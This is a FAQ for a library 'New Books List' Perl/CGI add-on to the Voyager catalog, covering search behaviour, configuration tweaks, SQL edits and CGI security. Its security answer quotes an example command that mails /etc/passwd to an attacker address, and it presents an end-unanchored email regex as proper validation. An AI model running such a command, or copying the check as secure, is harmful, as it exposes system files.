How does the keyword searching work?
The keyword searching facility has not previously been documented
and there are a few wrinkles to how searches are handled. Eventually
I will distribute a "Help page" that will explain it, but here
are the basics...
All keyword searches are regular expression matches against:
1) The title (i.e. the "245" field)
2) The author
3) The display call number
However, the search term must be at least two characters long to
be matched against either the title or author, where a single
character search term will still be matched against the call number.
This allows a patron to retrieve all the new items starting with
(for example) a "Q" or "M" call number without getting a lot of
false return hits on authors and titles. Call numbers longer than
one character are a lot less likely to return false hits against
titles or authors.
When a user does an "author" search (I have it in quotes because,
as I've stated above, every search over 1 character gets matched
against all three things) they should get a hit either by searching
"last_name, first_name" or "first_name last_name". The search
will pick up the first syntax by matching against the author value
and the second syntax because it is also matching against author
information in the 245 field.
Occasionally, a search will return entries that don't seem like
matches to the search term. This is because the full 245 field is
no longer displayed in the results, as it was in version 2.0. (For
display, it is now truncated at the "/" character.) So if a search
term matches (for example) on an illustrator's name in the 245
field, it will be retrieved, but that name won't appear in the
author column of the results page. (Clicking on the link to the
actual WebVoyage record will solve those mysteries.)
The keyword search function was a little added bonus that I didn't
want to clutter up with a lot of user options. I tried to program
it so that a search would return what the user would intuitively
expect it to, regardless of what they plug in as a search term.
I've not done usability testing to determine if I was successful,
but I'm very interested in feedback from the trenches.
Update: Version 4.0 now has a configuration option in newbooks.cgi
to allow for full display of the 245 field, if desired.
Top
Record titles and locations are centered rather than left-justified when viewed with the Internet Explorer 6.0 browser. How can this be fixed?
Internet Explorer 6.0 centers the content in table cells if the table
is placed within a div element that has the align attibute set
to "center." The HTML code of newbooks.cgi has been tweaked so that
pages look OK. The current 4.0 download tarball has the fix. (This
only affected newbooks.cgi; the newbooks.pl program was not changed.)
Top
We're still running Voyager 99.1. Can we use version 3.x of the New Books List?
Yes, with a little tweaking. The newbooks.cgi creates links back to
WebVoyage for each item. These "canned search" links work in 2000.1
but won't work in 99.1 until you adjust that part of the code.
(Endeavor changed the search query syntax between 99.1 and 2000.1.)
Example of code used in New Books List 2.0 (for Voyager 99.1):
/cgi-bin/Pwebrecon.cgi?DB=local&SA1=$isbn_only&BOOL1=as+a+phrase
&FLD1=ISBN+%28ISBN%29&CNT=50+records+per+page
Example of code used in New Books List 3.x (for Voyager 2000.1):
/cgi-bin/Pwebrecon.cgi?DB=local&Search_Arg=ISBN+%22$isbn_only%22
&SL=None&Search_Code=CMD&CNT=10
Also, the new books list search form as generated by the newbooks.cgi
program has been designed to mimic the Voyager 2000.1 look. If you
find this to be an aesthetic problem, the newbooks.cgi program
provides a way of disabling the default search form so that you can
create your own.
Top
How can I add a "New Books" tab to all the WebVoyage search screens?
Adding tabs to all the search screens can be accomplished by editing
the Tab_Text entry in the Course_Reserve_Search_Page stanza of the
/m1/voyager/xxxdb/etc/webvoyage/local/opac.ini file.
Replace this:
Tab_Text=Course Reserves
With this:
Tab_Text=Course Reserves</a> </font>
</th></tr></table></td><td> </td>
<td><table border="0" cellspacing="0" cellpadding="0">
<tr><th nowrap bgcolor="#003f7c"> <font
color="#fcf7ea"> <a style="color:#fcf7ea"
href="/cgi-bin/newbooks.cgi">New Books</a>
Note: There shouldn't be any line breaks. You will have to adjust
font, background, and style colors to match your site's scheme.
Credit: This solution comes courtesy of Alan Keely. Thanks Alan!
Top
Can we make the "In Process" message go away, or change it to something else?
I think all you have to do is edit a couple of lines down in the
guts of the newbooks.pl program.
Try replacing occurances of these lines
else { print OUTFILE " In Process\t"; }
with this
else { print OUTFILE " \t"; }
The no-break-space character ( ) will not display, but will
be a placeholder in the cell element of the table when items are
displayed.
Also make sure that $in_process_page = "no" in newbooks.cgi.
I *think* this should do the job without having any unwanted
side effects, but haven't tested it.
Top
We want to change the date range to monthly, going back 6 months... It looks like the newbooks.pl and newbooks.cgi will both need some modifications.
Yes, that can be done and you are right that both programs will
need modification. The University of Rochester has done just that.
(see: http://groucho.lib.rochester.edu/cgi-bin/newbooks.cgi)
I definitely encourage people to modify the programs to suit the
needs of their institutions. As I make enhancements myself, I also
try to keep in mind that the New Books List is only meant to fill
a tiny niche. Do we really want it to do the things that WebVoyage
does much better? Library staff, rather than patrons, are often
the ones that want the longer time periods (as an aid to gathering
statistics). Data like that are probably better obtained via
alternate Voyager reporting options.
Update: I have acceded to numerous requests for this functionality.
Version 4.0 now offers the option of retreiving either 4 months or
4 weeks of new items. -mdd
Top
I get a "Can't locate DBI.pm" error message when I try to run newbooks.pl. What's wrong?
Endeavor installs the DBI.pm and DBD.pm Perl module as part of the
Voyager 2000.1.x or higher upgrades. It's quite possible that the
error indicates that Perl is simply looking in the wrong place.
Try changing the top line of newbooks.pl from this:
#!/usr/local/bin/perl -w
to this:
#!/usr/bin/perl -w
That way, it will look for modules in the /usr/lib directory rather
than the /usr/local/lib directory. This difference has to do with
where and how Perl was originally installed on a particular server.
If that doesn't solve the problem, verify that you have the DBI.pm
module by running this command:
find /usr -name DBI.pm
If that does not locate the module, you may not have it installed.
Top
We have a split server arrangement. We're trying to run newbooks.pl from one of the Voyager application servers rather than the Voyager database server, but I'm getting Oracle connection errors. How can we make it work?
If you are attempting to run newbooks.pl from a server that's NOT the
Voyager database server, the Oracle connect statement needs to contain
additional information.
Try changing this line:
my $dbh = DBI->connect('dbi:Oracle:', $username, $password)
to this:
my $dbh = DBI->connect('dbi:Oracle:host=host_name;sid=LIBR;
port=1521', $username, $password)
Substitute your Voyager server name for "host_name" in the line above.
THIS WILL ONLY WORK IF the correct Oracle components and the Perl
DBI/Oracle DBD modules are already available on the application server.
Top
Why aren't there any government documents in newbooks.txt?
If you choose SQL Option 1 in newbooks.pl, retrieval is based on
aquisitions line item received, so would not pull any government
documents because they are not ordered and paid for through acquisitions.
SQL option 2 is based on bib item add date, so should include
government documents.
Update: The original SQL options have been superceeded by version
4.0's improved SQL statement, so there is no longer any retrieval
based on aquisitions criteria.
Top
I'm not sure what to use for location "fragments" in the newbooks.ini program. Can you explain what they do?
Each "fragment" is a subset/part/fragment (chosen by you) of the text
strings that are extracted from the xxxdb.location.location_display_name
field of the Voyager database. The fragment is used to do a Perl
regular expression match against the full string. So you simply want to
select a fragment that will match the intended location(s) and not any
other locations.
In UTA's case, for example, "Special" matches all the locations in our
Special Collections department, but will not match any locations in the
branches or the areas of the Central Library not included in Special
Collections. I could probably have used "Collect" as the fragment
instead (it needn't be a whole word).
"Special" will regexp match against these locations:
Special Collections, Floor 6: (Non-circulating)
Special Collections, Floor 6: Garrett (Non-circulating)
etc.
"Science" will regexp match against that branch library's locations:
Science & Engineering Library
Science & Engineering Library: Reserve
Science & Engineering Library: Reference
Again, I could just have easily used "Engineering" as the location
fragment to match all the locations in the Science & Engineering
Library.
Top
Many of the items in our list have not been cataloged yet. Is there a way of reducing the proportion of "In Process" items?
You might want to consider adjusting the date range for items that
are extracted. The default is for a four week window that ranges
from 1 week ago to 5 weeks ago.
You could slide that four week window so it covers from 2 weeks ago
to 6 weeks ago. With a two week, rather than a one week cushion,
more items should have made it to the shelves.
To accomplish that you will need to edit newbooks.pl...
change this line:
(ceil ((sysdate - status_date) / 7) - 1)
to this:
(ceil ((sysdate - status_date) / 7) - 2)
change this line:
(status_date between (sysdate - 35) and (sysdate - 7))
to this:
(status_date between (sysdate - 42) and (sysdate - 14))
change this line:
(ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 1)
to this:
(ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 2)
change this line:
($db_name.bib_item.add_date between (sysdate - 35) and (sysdate - 7))
to this:
($db_name.bib_item.add_date between (sysdate - 42) and (sysdate - 14))
Update: This solution has been incorporated into version 4.0 as the
"lag time" option. -mdd
Top
I would like to use the newbook.pl script in such a way that it'll print to STDOUT as follows "./newbooks.pl > newbooks.txt". This is because I'm maintaining two databases and I would like to use the same script for both.
The easiest way to do this, is to assign the value of the $out_file
variable to a parameter that is passed to the script. Something
similar to this:
if (! ($#ARGV == 0)) {
print "Usage: $0 output_file\n";
exit(1);
} else {
$out_file = shift;
}
Then you would run it like this: ./newbooks.pl newbooks.txt
Top
My system administrator is concerned about the security of the newbooks.cgi program. Do we have anything to worry about?
Here are some relevant questions to ask regarding CGI scripts...
1) What does the CGI script do with user input?
The most common CGI exploit is when a hacker includes shell meta-
characters in form input as a way of running system commands on
the web server. If the script itself does not attempt to run any
system commands using form input, then form data containing shell
metacharacters is not a concern. (A common system command used in
CGI scripts is when the script invokes a Unix mail program.)
If a script *does* use user supplied input (i.e. data included in
the name/value pairs read in from the form) somewhere in a system
call, then yes, there should be concern. In newbooks.cgi, the
ReadParse function checks for shell metacharacters and replaces
them with spaces.
If only one piece of user input is a potential security problem,
it is good to subject *it* to closer taint scrutiny. For example,
in newbooks.cgi v. 3.x in which mailx is used, the user-supplied
email address is subjected to this test (which makes sure that
the input is a proper email address):
# ...then check for valid characters
unless ( $mail_address =~ /^\w{1}[\w\-\.]*\@[\w\-\.]+/ ) {
# if "bad"
&MailAck("faulty");
}
It's generally better to check input for what it *should* be, rather
than for what it *shouldn't* be. "What it should be" will always be
a subset of "what it shouldn't be", and is therefore a more secure
evaluation.
2) Who is your "httpd" user?
If your Apache web server is properly configured, httpd processes
are owned by the user "nobody" and therefore CGI programs are
executed by "nobody." This means that unless you have world-
writable files and directories, the damage that can be done by a
malicious user is minimal.
They may however still be able to run unintended applications and
read files - the classic example is something along the lines of
'mailx hacker@blackhat.com < /etc/passwd'.
There is not meant to be a comprehensive overview of CGI security,
it is intended to assure you that I was aware of security issues
when the programs were written.
Top
|